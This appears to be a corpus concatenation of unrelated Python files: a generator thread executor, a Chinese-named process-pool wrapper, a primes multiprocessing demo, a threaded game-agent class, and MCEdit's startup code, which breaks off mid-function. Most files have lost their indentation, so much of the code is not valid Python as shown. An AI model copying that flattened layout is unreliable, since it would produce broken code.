self.mExecutor.mMultiThreadDispatcher.addThreadId(gen_thread.genThreadID)
self.mExecutor.mMultiThreadDispatcher.start()
Log.noticeNoBlock("Multi-threading phase entered.")
return self
## Iterate through all GenThread objects to set their dispatcher back to the single-thread one.
#
def __exit__(self, *unused):
self.mExecutor.mMultiThreadDispatcher.stop()
Log.noticeNoBlock("Multi-threading phase exited.")
ThreadDispatcher.setCurrentDispatcher(self.mExecutor.mSingleThreadDispatcher)
return False
## Put in barrier at the thread starting phase so all threads will start orderly.
# Remove the thread ID from dispatcher so that all threads will finish orderly.
class ExecutionContextManager:
def __init__(self, aThreadId, aDispatcher, aStartBarrier):
self.mThreadId = aThreadId
self.mDispatcher = aDispatcher
self.mStartBarrier = aStartBarrier
## Add thread ID to dispatcher.
#
def __enter__(self):
self.mDispatcher.registerExecutionThread(self.mThreadId)
self.mStartBarrier.wait()
return self
## Remove thread ID from dispatcher
#
def __exit__(self, *aUnused):
self.mDispatcher.reportThreadDone()
return False
## Factory class to return the correct GenThreadExecutor object.
#
class GenThreadExecutorFactory:
@staticmethod
def createGenThreadExecutor(genThreadCount):
if genThreadCount == 1:
executor = SingleGenThreadExecutor()
else:
executor = MultiGenThreadExecutor()
ThreadDispatcher.setCurrentDispatcher(executor.mSingleThreadDispatcher)
return executor
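# --- Illustrative usage sketch; not part of the module above ---
# A minimal, hedged example using a stand-in for the real GenThread class,
# which lives elsewhere in the generator framework.
if __name__ == '__main__':
    class _StubGenThread:
        """Hypothetical stand-in exposing the interface executeGenThread expects."""
        def __init__(self, thread_id):
            self.genThreadID = thread_id
        def setup(self):
            pass
        def generate(self):
            print('generating on thread %d' % self.genThreadID)
        def cleanUp(self):
            pass

    gen_threads = [_StubGenThread(0)]
    executor = GenThreadExecutorFactory.createGenThreadExecutor(len(gen_threads))
    executor.executeGenThreads(gen_threads)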
|
processPoolUtil.py
|
"""
.. Hint::
进程池使用方法
方便的使用python开启多进程
.. literalinclude:: ..\..\..\example\进程池测试.py
:language: python
:caption: 代码示例
:linenos:
:lines: 1-40
"""
import multiprocessing
from pyefun import 事件锁
class 进程队列:
def __init__(self):
self.队列对象 = multiprocessing.Queue()
def 加入数据(self, 要加入的数据):
self.队列对象.put(要加入的数据)
def 获取数据(self):
return self.队列对象.get()
class 进程:
def __init__(self, 子程序名, 元组参数=(), 字典参数={}, 进程名=None):
self.进程对象 = multiprocessing.Process(target=子程序名, args=元组参数, kwargs=字典参数, name=进程名)
def 启动(self):
self.进程对象.start()
def 关闭(self):
self.进程对象.close()
def 等待进程(self, 超时时间=None):
"""如果可选参数timeout是None,则该方法将阻塞,直到join()调用其方法的进程终止。如果timeout是一个正数,它最多会阻塞超时秒。请注意,None如果方法的进程终止或方法超时,则返回该方法。检查进程exitcode以确定它是否终止。"""
self.进程对象.join(超时时间)
def 取进程名(self):
return self.进程对象.name
def 是否存在(self):
"""返回逻辑型"""
return self.进程对象.is_alive()
def 取pid(self):
return self.进程对象.pid
def 终止子进程(self):
"""子进程的退出代码。None如果流程尚未终止,这将是。负值-N表示孩子被信号N终止。"""
return self.进程对象.exitcode
def 守护(self, 是否守护进程=True):
""" 这个必须在 进程启动先 设置,否则无效 进程的守护进程标志,一个布尔值。必须在start()调用之前设置,当进程退出时,它会尝试终止其所有守护进程子进程。"""
self.进程对象.daemon = 是否守护进程
class 进程池():
def __init__(self, 进程数, 投递任务时阻塞=True):
self.进程池对象 = multiprocessing.Pool(processes=进程数)
self.投递任务时阻塞 = 投递任务时阻塞
if (投递任务时阻塞 == True):
self.已投递任务数量 = 0
self.最大线程数量 = 进程数
self.锁 = 事件锁()
def 投递任务(self, 子程序, 回调函数=None, 回调报错=None, *args, **kwds):
if self.投递任务时阻塞:
if (self.已投递任务数量 >= self.最大线程数量):
self.锁.堵塞()
self.锁.等待()
self.已投递任务数量 = self.已投递任务数量 + 1
if self.投递任务时阻塞:
    回调函数保存 = 回调函数
    回调报错保存 = 回调报错
    def 回调函数x(e):
        # release one slot whether the task succeeded or failed
        self.已投递任务数量 = self.已投递任务数量 - 1
        self.锁.通行()
        if 回调函数保存 is not None:
            回调函数保存(e)
    def 回调报错x(e):
        self.已投递任务数量 = self.已投递任务数量 - 1
        self.锁.通行()
        if 回调报错保存 is not None:
            回调报错保存(e)
    回调函数 = 回调函数x
    回调报错 = 回调报错x
启动对象 = self.进程池对象.apply_async(func=子程序, args=args, kwds=kwds, callback=回调函数, error_callback=回调报错)
return 启动对象
def 投递任务2(self, 子程序, 迭代列表):
"""这个用的少,一个子程序报错,全部会报错,后面的函数没有补全了"""
启动对象 = self.进程池对象.map_async(func=子程序, iterable=迭代列表)
return 启动对象
def 等待(self):
self.停止添加子进程()
self.等待子进程结束()
def 停止添加子进程(self):
""" 防止任何更多的任务被提交到池中。 一旦完成所有任务,工作进程将退出。"""
self.进程池对象.close()
def 终止所有子进程(self):
"""立即停止工作进程而不完成未完成的工作。当池对象被垃圾收集时,terminate()将立即调用。;"""
self.进程池对象.terminate()
def 等待子进程结束(self):
""" 等待工作进程退出。必须打电话close()或 terminate()使用之前join()。"""
self.进程池对象.join()
def 取返回值(self, 启动对象):
return 启动对象.get()
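# --- Illustrative usage sketch; not part of the module above ---
# A minimal, hedged example; it assumes pyefun (which provides 事件锁) is
# installed so that this module imports cleanly. The helper below is a
# hypothetical worker, defined at module level so it stays picklable.
def _示例_平方(x):
    return x * x

if __name__ == '__main__':
    池 = 进程池(进程数=2)
    for i in range(4):
        池.投递任务(_示例_平方, print, None, i)
    池.等待()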
|
procs.py
|
#!/usr/bin/env python3
"""
procs.py: shows that multiprocessing on a multicore machine
can be faster than sequential code for CPU-intensive work.
"""
# tag::PRIMES_PROC_TOP[]
import sys
from time import perf_counter
from typing import NamedTuple
from multiprocessing import Process, SimpleQueue, cpu_count # <1>
from multiprocessing import queues # <2>
from primes import is_prime, NUMBERS
class PrimeResult(NamedTuple): # <3>
n: int
prime: bool
elapsed: float
JobQueue = queues.SimpleQueue # <4>
ResultQueue = queues.SimpleQueue # <5>
def check(n: int) -> PrimeResult: # <6>
t0 = perf_counter()
res = is_prime(n)
return PrimeResult(n, res, perf_counter() - t0)
def worker(jobs: JobQueue, results: ResultQueue) -> None: # <7>
while True:
n = jobs.get() # <8>
if n == 0:
break
results.put(check(n)) # <9>
# end::PRIMES_PROC_TOP[]
# tag::PRIMES_PROC_MAIN[]
def main() -> None:
if len(sys.argv) < 2: # <1>
workers = cpu_count()
else:
workers = int(sys.argv[1])
print(f'Checking {len(NUMBERS)} numbers with {workers} processes:')
jobs: JobQueue = SimpleQueue() # <2>
results: ResultQueue = SimpleQueue()
t0 = perf_counter()
for n in NUMBERS: # <3>
jobs.put(n)
for _ in range(workers):
proc = Process(target=worker, args=(jobs, results)) # <4>
proc.start() # <5>
jobs.put(0) # <6>
while True:
n, prime, elapsed = results.get() # <7>
label = 'P' if prime else ' '
print(f'{n:16} {label} {elapsed:9.6f}s') # <8>
if jobs.empty(): # <9>
break
elapsed = perf_counter() - t0
print(f'Total time: {elapsed:.2f}s')
if __name__ == '__main__':
main()
# end::PRIMES_PROC_MAIN[]
|
baseThreadedAgent.py
|
from threading import Thread
from time import sleep
from agents.baseAgent import baseAgent
class baseThreadedAgent(baseAgent):
'''Extends baseAgent in order to provide multithreading functionality.
Attributes:
thread (Thread): Thread used by agent to do precalculations.
isStopping (bool): Whether the thread is being interrupted. Should not be set.
expected (dict): The expected future states and the optimal moves for those states.
move (tuple): The most recently computed move, consumed by getMove.
'''
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.thread = None
self.isStopping = False
self.expected = {} #state and move pairs
self.move = None
#Extendables
#setter
def update(self,state,curPiece):
super().update(state,curPiece)
if self.thread != None:
self.isStopping = True
self.thread.join()
self.thread = None
self.isStopping = False
self.thread = Thread(target=self.calculate)  # pass the method itself; calling it here would block
self.thread.start()
return
#for classes to implement
def calculate(self):
'''How precalculations should be done. Should be overridden.'''
pass
#getter
def getMove(self,state=None):
super().getMove(state)
while self.move is None:
sleep(5)
move = tuple(self.move)
self.move = None
return move
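# --- Illustrative subclass sketch; not part of the module above ---
# A hedged example of overriding calculate(); the move representation is a
# hypothetical placeholder.
#
#     class randomAgent(baseThreadedAgent):
#         def calculate(self):
#             # precompute until update() interrupts us via isStopping
#             while not self.isStopping and self.move is None:
#                 self.move = (0, 0)  # placeholder "best" move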
|
mcedit.py
|
#!/usr/bin/env python2.7
# -*- coding: utf_8 -*-
# import resource_packs # not the right place, moving it a bit further
#-# Modified by D.C.-G. for translation purpose
#.# Marks the layout modifications. -- D.C.-G.
from __future__ import unicode_literals
"""
mcedit.py
Startup, main menu, keyboard configuration, automatic updating.
"""
import splash
import OpenGL
import sys
import os
if "--debug-ogl" not in sys.argv:
OpenGL.ERROR_CHECKING = False
import logging
# Setup file and stderr logging.
logger = logging.getLogger()
# Set the log level up while importing OpenGL.GL to hide some obnoxious warnings about old array handlers
logger.setLevel(logging.WARN)
logger.setLevel(logging.DEBUG)
logfile = 'mcedit.log'
if sys.platform == "darwin":
logfile = os.path.expanduser("~/Library/Logs/mcedit.log")
else:
logfile = os.path.join(os.getcwdu(), logfile)
fh = logging.FileHandler(logfile, mode="w")
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.WARN)
if "--log-info" in sys.argv:
ch.setLevel(logging.INFO)
if "--log-debug" in sys.argv:
ch.setLevel(logging.DEBUG)
class FileLineFormatter(logging.Formatter):
def format(self, record):
record.__dict__['fileline'] = "%(module)s.py:%(lineno)d" % record.__dict__
record.__dict__['nameline'] = "%(name)s.py:%(lineno)d" % record.__dict__
return super(FileLineFormatter, self).format(record)
fmt = FileLineFormatter(
'[%(levelname)8s][%(nameline)30s]:%(message)s'
)
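# Illustrative: with this format a record is rendered along the lines of
# [ WARNING][                    root.py:42]:Starting MCEdit-Unified ...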
fh.setFormatter(fmt)
ch.setFormatter(fmt)
logger.addHandler(fh)
logger.addHandler(ch)
import release
if __name__ == "__main__":
start_msg = 'Starting MCEdit-Unified v%s' % release.TAG
logger.info(start_msg)
print '[ ****** ] ~~~~~~~~~~ %s' % start_msg
#---------------------------------------------------------------------
# NEW FEATURES HANDLING
#
# The idea is to be able to implement and test/use new code without stripping off the current one.
# These features/new code will be in the released stuff, but unavailable until explicitly requested.
#
# The new features which are under development can be enabled using the 'new_features.def' file.
# This file is a plain text file with one feature to enable a line.
# The file is parsed and each feature is added to the builtins using the pattern 'mcenf_<feature>'.
# The value for these builtins is 'True'.
# Then, in the code, just check if the builtins has the key 'mcenf_<feature>' to use the new version of the code:
#
# ```
# def foo_old():
# # Was 'foo', code here is the one used unless the new version is wanted.
# [...]
#
# def foo_new():
# # This is the new version of the former 'foo' (current 'foo_old').
# [...]
#
# if __builtins__.get('mcenf_foo', False):
# foo = foo_new
# else:
# foo = foo_old
#
# ```
#
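# Example 'new_features.def' contents (illustrative feature names):
#
#     # lines starting with '#' are ignored
#     foo
#     shiny_renderer
#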
if __name__ == "__main__" and '--new-features' in sys.argv:
if not os.path.exists('new_features.def'):
logger.warning("New features requested, but file 'new_features.def' not found!")
else:
logger.warning("New features mode requested.")
lines = [a.strip() for a in open('new_features.def', 'r').readlines()]
for line in lines:
_ln = line.strip()
if _ln and not _ln.startswith("#"):
setattr(__builtins__, 'mcenf_%s' % line, True)
logger.warning("Activating 'mcenf_%s'" % line)
logger.warning("New features list loaded.")
from player_cache import PlayerCache
import directories
import keys
import albow
import locale
DEF_ENC = locale.getdefaultlocale()[1]
if DEF_ENC is None:
DEF_ENC = "UTF-8"
from albow.translate import _, getPlatInfo
from albow.openglwidgets import GLViewport
from albow.root import RootWidget
from config import config
if __name__ == "__main__":
#albow.resource.resource_dir = directories.getDataDir()
albow.resource.resource_dir = directories.getDataFile()
def create_mocked_pyclark():
import imp
class MockedPyClark(object):
class Clark(object):
def report(self, *args, **kwargs):
pass
global_clark = Clark()
mod = imp.new_module('pyClark')
mod = MockedPyClark()
sys.modules['pyClark'] = mod
return mod
global pyClark
pyClark = None
if getattr(sys, 'frozen', False) or '--report-errors' in sys.argv:
if config.settings.reportCrashes.get():
try:
import pyClark
pyClark.Clark('http://127.0.0.1', inject=True)
logger.info('Successfully setup pyClark')
except ImportError:
pyClark = create_mocked_pyclark()
logger.info('The \'pyClark\' module has not been installed, disabling error reporting')
pass
else:
logger.info('User has opted out of pyClark error reporting')
print type(create_mocked_pyclark())
pyClark = create_mocked_pyclark()
print pyClark
else:
pyClark = create_mocked_pyclark()
import panels
import leveleditor
# Building translation template
if __name__ == "__main__" and "-tt" in sys.argv:
sys.argv.remove('-tt')
# Overwrite the default marker to have one adapted to our specific needs.
albow.translate.buildTemplateMarker = """
### THE FOLLOWING LINES HAVE BEEN ADDED BY THE TEMPLATE UPDATE FUNCTION.
### Please consider analyzing them and removing the entries that refer
### to ones containing string formatting.
###
### For example, if you have a line already defined with this text:
### My %{animal} has %d legs.
### you may find lines like these below:
### My parrot has 2 legs.
### My dog has 4 legs.
###
### You also may have unwanted partial strings, especially the ones
### used in hotkeys. Delete them too.
### And, remove this paragraph, or it will be displayed in the program...
"""
albow.translate.buildTemplate = True
albow.translate.loadTemplate()
# Save the language defined in config and set en_US as current one.
logging.warning('MCEdit is invoked to update the translation template.')
orglang = config.settings.langCode.get()
logging.warning('The actual language is %s.' % orglang)
logging.warning('Setting en_US as language for this session.')
config.settings.langCode.set('en_US')
import mceutils
import mcplatform
# The two next switches '--debug-wm' and '--no-wm' are used to debug/disable the internal window handler.
# They are exclusive. You can't debug if it is disabled.
if __name__ == "__main__":
if "--debug-wm" in sys.argv:
mcplatform.DEBUG_WM = True
if "--no-wm" in sys.argv:
mcplatform.DEBUG_WM = False
mcplatform.USE_WM = False
else:
mcplatform.setupWindowHandler()
DEBUG_WM = mcplatform.DEBUG_WM
USE_WM = mcplatform.USE_WM
#-# DEBUG
if mcplatform.hasXlibDisplay and DEBUG_WM:
print '*** Xlib version', str(mcplatform.Xlib.__version__).replace(' ', '').replace(',', '.')[1:-1], 'found in',
if os.path.expanduser('~/.local/lib/python2.7/site-packages') in mcplatform.Xlib.__file__:
print 'user\'s',
else:
print 'system\'s',
print 'libraries.'
#-#
from mcplatform import platform_open
import numpy
from pymclevel.minecraft_server import ServerJarStorage
import os.path
import pygame
from pygame import display, rect
import pymclevel
import shutil
import traceback
import threading
from utilities.gl_display_context import GLDisplayContext
import mclangres
from utilities import mcver_updater, mcworld_support
getPlatInfo(OpenGL=OpenGL, numpy=numpy, pygame=pygame)
ESCAPE = '\033'
class MCEdit(GLViewport):
def_enc = DEF_ENC
def __init__(self, displayContext, *args):
if DEBUG_WM:
print "############################ __INIT__ ###########################"
self.resizeAlert = config.settings.showWindowSizeWarning.get()
self.maximized = config.settings.windowMaximized.get()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
if displayContext.win and DEBUG_WM:
print "* self.displayContext.win.state", displayContext.win.get_state()
print "* self.displayContext.win.position", displayContext.win.get_position()
self.dis = None
self.win = None
self.wParent = None
self.wGrandParent = None
self.linux = False
if sys.platform == 'linux2' and mcplatform.hasXlibDisplay:
self.linux = True
self.dis = dis = mcplatform.Xlib.display.Display()
self.win = win = dis.create_resource_object('window', display.get_wm_info()['window'])
curDesk = os.environ.get('XDG_CURRENT_DESKTOP')
if curDesk in ('GNOME', 'X-Cinnamon', 'Unity'):
self.geomReciever = self.maximizeHandler = wParent = win.query_tree().parent
self.geomSender = wGrandParent = wParent.query_tree().parent
elif curDesk == 'KDE':
self.maximizeHandler = win.query_tree().parent
wParent = win.query_tree().parent.query_tree().parent
wGrandParent = wParent.query_tree().parent.query_tree().parent
self.geomReciever = self.geomSender = win.query_tree().parent.query_tree().parent.query_tree().parent
else:
self.maximizeHandler = self.geomReciever = self.geomSender = wGrandParent = wParent = None
self.wParent = wParent
self.wGrandParent = wGrandParent
root = dis.screen().root
windowID = root.get_full_property(dis.intern_atom('_NET_ACTIVE_WINDOW'), mcplatform.Xlib.X.AnyPropertyType).value[0]
print "###\nwindowID", windowID
window = dis.create_resource_object('window', windowID)
print "###\nwindow.get_geometry()", window.get_geometry()
print "###\nself.win", self.win.get_geometry()
print "###\nself.wParent.get_geometry()", self.wParent.get_geometry()
print "###\nself.wGrandParent.get_geometry()", self.wGrandParent.get_geometry()
try:
print "###\nself.wGrandParent.query_tree().parent.get_geometry()", self.wGrandParent.query_tree().parent.get_geometry()
except:
pass
print "###\nself.maximizeHandler.get_geometry()", self.maximizeHandler.get_geometry()
print "###\nself.geomReciever.get_geometry()", self.geomReciever.get_geometry()
print "###\nself.geomSender.get_geometry()", self.geomSender.get_geometry()
print "###\nself.win", self.win
print "###\nself.wParent", self.wParent
print "###\nself.wGrandParent", self.wGrandParent
print "###\nself.maximizeHandler", self.maximizeHandler
print "###\nself.geomReciever", self.geomReciever
print "###\nself.geomSender", self.geomSender
ws = displayContext.getWindowSize()
r = rect.Rect(0, 0, ws[0], ws[1])
GLViewport.__init__(self, r)
if DEBUG_WM:
print "self.size", self.size, "ws", ws
if displayContext.win and self.maximized:
# Send a maximize event now
displayContext.win.set_state(mcplatform.MAXIMIZED)
# Flip pygame.display to avoid to see the splash un-centered.
pygame.display.flip()
self.displayContext = displayContext
self.bg_color = (0, 0, 0, 1)
self.anchor = 'tlbr'
if not config.config.has_section("Recent Worlds"):
config.config.add_section("Recent Worlds")
self.setRecentWorlds([""] * 5)
self.optionsPanel = panels.OptionsPanel(self)
if not albow.translate.buildTemplate:
self.optionsPanel.getLanguageChoices()
lng = config.settings.langCode.get()
if lng not in self.optionsPanel.sgnal:
lng = "en_US"
config.settings.langCode.set(lng)
albow.translate.setLang(lng)
# Set the window caption here again, since the initialization is done through several steps...
display.set_caption(('MCEdit ~ ' + release.get_version() % _("for")).encode('utf-8'), 'MCEdit')
self.optionsPanel.initComponents()
self.graphicsPanel = panels.GraphicsPanel(self)
#.#
self.keyConfigPanel = keys.KeyConfigPanel(self)
#.#
self.droppedLevel = None
self.nbtCopyBuffer = None
self.reloadEditor()
"""
check command line for files dropped from explorer
"""
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
f = arg.decode(sys.getfilesystemencoding())
if os.path.isdir(os.path.join(pymclevel.minecraftSaveFileDir, f)):
f = os.path.join(pymclevel.minecraftSaveFileDir, f)
self.droppedLevel = f
break
if os.path.exists(f):
self.droppedLevel = f
break
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.fileOpener.focus()
#-# Translation live update preparation
def set_update_ui(self, v):
GLViewport.set_update_ui(self, v)
if v:
#&# Prototype for blocks/items names
if self.editor.level:
mclangres.buildResources(self.editor.level.gameVersion, albow.translate.getLang())
#&#
self.keyConfigPanel = keys.KeyConfigPanel(self)
self.graphicsPanel = panels.GraphicsPanel(self)
if self.fileOpener in self.subwidgets:
idx = self.subwidgets.index(self.fileOpener)
self.remove(self.fileOpener)
self.fileOpener = albow.FileOpener(self)
if idx is not None:
self.add(self.fileOpener)
self.fileOpener.focus()
#-#
editor = None
def reloadEditor(self):
reload(leveleditor)
level = None
pos = None
if self.editor:
level = self.editor.level
self.remove(self.editor)
c = self.editor.mainViewport
pos, yaw, pitch = c.position, c.yaw, c.pitch
self.editor = leveleditor.LevelEditor(self)
self.editor.anchor = 'tlbr'
if level:
self.add(self.editor)
self.editor.gotoLevel(level)
self.focus_switch = self.editor
if pos is not None:
c = self.editor.mainViewport
c.position, c.yaw, c.pitch = pos, yaw, pitch
def add_right(self, widget):
w, h = self.size
widget.centery = h // 2
widget.right = w
self.add(widget)
def showOptions(self):
self.optionsPanel.present()
def showGraphicOptions(self):
self.graphicsPanel.present()
def showKeyConfig(self):
self.keyConfigPanel.presentControls()
def loadRecentWorldNumber(self, i):
worlds = list(self.recentWorlds())
if i - 1 < len(worlds):
self.loadFile(worlds[i - 1])
numRecentWorlds = 5
@staticmethod
def removeLevelDat(filename):
if filename.endswith("level.dat"):
filename = os.path.dirname(filename)
return filename
def recentWorlds(self):
worlds = []
for i in xrange(self.numRecentWorlds):
if config.config.has_option("Recent Worlds", str(i)):
try:
filename = (config.config.get("Recent Worlds", str(i)).decode('utf-8'))
worlds.append(self.removeLevelDat(filename))
except Exception as e:
logging.error(repr(e))
return list((f for f in worlds if f and os.path.exists(f)))
def addRecentWorld(self, filename):
filename = self.removeLevelDat(filename)
rw = list(self.recentWorlds())
if filename in rw:
return
rw = [filename] + rw[:self.numRecentWorlds - 1]
self.setRecentWorlds(rw)
@staticmethod
def setRecentWorlds(worlds):
for i, filename in enumerate(worlds):
config.config.set("Recent Worlds", str(i), filename.encode('utf-8'))
def makeSideColumn1(self):
def showLicense():
#platform_open(os.path.join(directories.getDataDir(), "LICENSE.txt"))
platform_open(directories.getDataFile('LICENSE.txt'))
def refresh():
PlayerCache().force_refresh()
def update_mcver():
num = mcver_updater.run()
if num:
albow.alert("Version Definitions have been updated!\n\nPlease restart MCEdit-Unified to apply the changes")
else:
albow.alert("Version Definitions are already up-to-date!")
hotkeys = ([("",
"Controls",
self.showKeyConfig),
("",
"Graphics",
self.showGraphicOptions),
("",
"Options",
self.showOptions),
("",
"Homepage",
lambda: platform_open("http://www.mcedit-unified.net"),
"http://www.mcedit-unified.net"),
("",
"About MCEdit",
lambda: platform_open("http://www.mcedit-unified.net/about.html"),
"http://www.mcedit-unified.net/about.html"),
("",
"License",
showLicense,
#os.path.join(directories.getDataDir(), "LICENSE.txt")),
directories.getDataFile('LICENSE.txt')),
("",
"Refresh Player Names",
refresh),
("",
"Update Version Definitions",
update_mcver)
])
c = albow.HotkeyColumn(hotkeys)
return c
def makeSideColumn2(self):
def showCacheDir():
try:
os.mkdir(directories.getCacheDir())
except OSError:
pass
platform_open(directories.getCacheDir())
def showScreenshotsDir():
try:
os.mkdir(os.path.join(directories.getCacheDir(), "screenshots"))
except OSError:
pass
platform_open(os.path.join(directories.getCacheDir(), "screenshots"))
hotkeys = ([("",
"Config Files",
showCacheDir,
directories.getCacheDir()),
("",
"Screenshots",
showScreenshotsDir,
os.path.join(directories.getCacheDir(), "screenshots"))
])
c = albow.HotkeyColumn(hotkeys)
return c
def resized(self, dw, dh):
"""
Handle window resizing events.
"""
if DEBUG_WM:
print "############################ RESIZED ############################"
(w, h) = self.size
config_w, config_h = config.settings.windowWidth.get(), config.settings.windowHeight.get()
win = self.displayContext.win
if DEBUG_WM and win:
print "dw", dw, "dh", dh
print "self.size (w, h) 1", self.size, "win.get_size", win.get_size()
print "size 1", config_w, config_h
elif DEBUG_WM and not win:
print "win is None, unable to print debug messages"
if win:
x, y = win.get_position()
if DEBUG_WM:
print "position", x, y
print "config pos", (config.settings.windowX.get(), config.settings.windowY.get())
if w == 0 and h == 0:
# The window has been minimized, no need to draw anything.
self.editor.renderer.render = False
return
# Mac window handling works better now, but `win` doesn't exist there. To get
# this alert to show up on Mac we also check whether the platform is darwin.
# This only works because the code block never actually references `win`,
# otherwise it WOULD CRASH!!!
# Later `if` statements cannot be relaxed the same way because they really do
# reference `win`.
if win or sys.platform == "darwin":
# Handling too small resolutions.
# Dialog texts.
# "MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution."
# New buttons:
# "Don't warn me again": disable the window popup across sessions.
# Tooltip: "Disable this message. Definitively. Even the next time you start MCEdit."
# "OK": dismiss the window and let go, don't pop up again for the session
# Tooltip: "Continue and not see this message until you restart MCEdit"
# "Cancel": resizes the window to the minimum size
# Tooltip: "Resize the window to the minimum recommended resolution."
# If the config showWindowSizeWarning is true and self.resizeAlert is true, show the popup
if (w < 1000 or h < 680) and config.settings.showWindowSizeWarning.get():
_w = w
_h = h
if self.resizeAlert:
answer = "_OK"
# Force the size only for the dimension that needs it.
if w < 1000 and h < 680:
_w = 1000
_h = 680
elif w < 1000:
_w = 1000
elif h < 680:
_h = 680
if not albow.dialogs.ask_tied_to:
answer = albow.ask(
"MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution.",
["Don't remind me again.", "OK", "Cancel"], default=1, cancel=1,
responses_tooltips={
"Don't remind me again.": "Disable this message. Definitively. Even the next time you start MCEdit.",
"OK": "Continue and not see this message until you restart MCEdit",
"Cancel": "Resize the window to the minimum recommended resolution."},
tie_widget_to=True)
else:
if not albow.dialogs.ask_tied_to._visible:
albow.dialogs.ask_tied_to._visible = True
answer = albow.dialogs.ask_tied_to.present()
if answer == "Don't remind me again.":
config.settings.showWindowSizeWarning.set(False)
self.resizeAlert = False
elif answer == "OK":
w, h = self.size
self.resizeAlert = False
elif answer == "Cancel":
w, h = _w, _h
else:
if albow.dialogs.ask_tied_to:
albow.dialogs.ask_tied_to.dismiss("_OK")
del albow.dialogs.ask_tied_to
albow.dialogs.ask_tied_to = None
elif w >= 1000 or h >= 680:
if albow.dialogs.ask_tied_tos:
for ask_tied_to in albow.dialogs.ask_tied_tos:
ask_tied_to._visible = False
ask_tied_to.dismiss("_OK")
ask_tied_to.set_parent(None)
del ask_tied_to
if not win:
if w < 1000:
config.settings.windowWidth.set(1000)
w = 1000
x = config.settings.windowX.get()
if h < 680:
config.settings.windowHeight.set(680)
h = 680
y = config.settings.windowY.get()
if not self.editor.renderer.render:
self.editor.renderer.render = True
save_geom = True
if win:
maximized = win.get_state() == mcplatform.MAXIMIZED
sz = map(max, win.get_size(), (w, h))
if DEBUG_WM:
print "sz", sz
print "maximized", maximized, "self.maximized", self.maximized
if maximized:
if DEBUG_WM:
print "maximize, saving maximized size"
config.settings.windowMaximizedWidth.set(sz[0])
config.settings.windowMaximizedHeight.set(sz[1])
config.save()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
save_geom = False
self.resizing = 0
win.set_mode(sz, self.displayContext.displayMode())
else:
if DEBUG_WM:
print "size 2", config.settings.windowWidth.get(), config.settings.windowHeight.get()
print "config_w", config_w, "config_h", config_h
print "pos", config.settings.windowX.get(), config.settings.windowY.get()
if self.maximized != maximized:
if DEBUG_WM:
print "restoring window pos and size"
print "(config.settings.windowX.get(), config.settings.windowY.get())", (
config.settings.windowX.get(), config.settings.windowY.get())
(w, h) = (config_w, config_h)
win.set_state(1, (w, h), self.saved_pos)
else:
if DEBUG_WM:
print "window resized"
print "setting size to", (w, h), "and pos to", (x, y)
win.set_mode((w, h), self.displayContext.displayMode())
win.set_position((x, y))
config.settings.windowMaximizedWidth.set(0)
config.settings.windowMaximizedHeight.set(0)
config.save()
self.maximized = maximized
if DEBUG_WM:
print "self.size (w, h) 2", self.size, (w, h)
surf = pygame.display.get_surface()
print "display surf rect", surf.get_rect()
if win:
if hasattr(win.base_handler, 'get_geometry'):
print "win.base_handler geometry", win.base_handler.get_geometry()
print "win.base_handler.parent geometry", win.base_handler.query_tree().parent.get_geometry()
print "win.base_handler.parent.parent geometry", win.base_handler.query_tree().parent.query_tree().parent.get_geometry()
if save_geom:
config.settings.windowWidth.set(w)
config.settings.windowHeight.set(h)
config.save()
# The alert window is disabled if win is not None
if not win and (dw > 20 or dh > 20):
if not hasattr(self, 'resizeAlert'):
self.resizeAlert = self.shouldResizeAlert
if self.resizeAlert:
albow.alert(
"Window size increased. You may have problems using the cursor until MCEdit is restarted.")
self.resizeAlert = False
if win:
win.sync()
GLViewport.resized(self, dw, dh)
shouldResizeAlert = config.settings.shouldResizeAlert.property()
def loadFile(self, filename, addToRecent=True):
if os.path.exists(filename):
if filename.endswith(".mcworld"):
filename = mcworld_support.open_world(filename)
addToRecent = False
try:
self.editor.loadFile(filename, addToRecent=addToRecent)
except NotImplementedError as e:
albow.alert(e.message)
return None
except Exception as e:
logging.error(u'Failed to load file {0}: {1!r}'.format(
filename, e))
return None
self.remove(self.fileOpener)
self.fileOpener = None
if self.editor.level:
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
def createNewWorld(self):
level = self.editor.createNewLevel()
if level:
self.remove(self.fileOpener)
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
albow.alert(
"World created. To expand this infinite world, explore the world in Minecraft or use the Chunk Control tool to add or delete chunks.")
def removeEditor(self):
self.remove(self.editor)
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.focus_switch = self.fileOpener
def confirm_quit(self):
#-# saving language template
if hasattr(albow.translate, "saveTemplate"):
albow.translate.saveTemplate()
#-#
self.saveWindowPosition()
config.save()
if self.editor.unsavedEdits:
result = albow.ask(_("There are {0} unsaved changes.").format(self.editor.unsavedEdits),
responses=["Save and Quit", "Quit", "Cancel"])
if result == "Save and Quit":
self.saveAndQuit()
elif result == "Quit":
self.justQuit()
elif result == "Cancel":
return False
else:
raise SystemExit
def saveAndQuit(self):
self.editor.saveFile()
raise SystemExit
@staticmethod
def justQuit():
raise SystemExit
@classmethod
def fetch_version(cls):
with cls.version_lock:
cls.version_info = release.fetch_new_version_info()
def check_for_version(self):
new_version = release.check_for_new_version(self.version_info)
if new_version is not False:
answer = albow.ask(
_('Version {} is available').format(new_version["tag_name"]),
[
'Download',
'View',
'Ignore'
],
default=1,
cancel=2
)
if answer == "View":
platform_open(new_version["html_url"])
elif answer == "Download":
platform_open(new_version["asset"]["browser_download_url"])
albow.alert(_(
' {} should now be downloading via your browser. You will still need to extract the downloaded file to use the updated version.').format(
new_version["asset"]["name"]))
@classmethod
def main(cls):
PlayerCache().load()
displayContext = GLDisplayContext(splash.splash, caption=(
('MCEdit ~ ' + release.get_version() % _("for")).encode('utf-8'), 'MCEdit'))
os.environ['SDL_VIDEO_CENTERED'] = '0'
rootwidget = RootWidget(displayContext.display)
mcedit = MCEdit(displayContext)
rootwidget.displayContext = displayContext
rootwidget.confirm_quit = mcedit.confirm_quit
rootwidget.mcedit = mcedit
rootwidget.add(mcedit)
rootwidget.focus_switch = mcedit
if mcedit.droppedLevel:
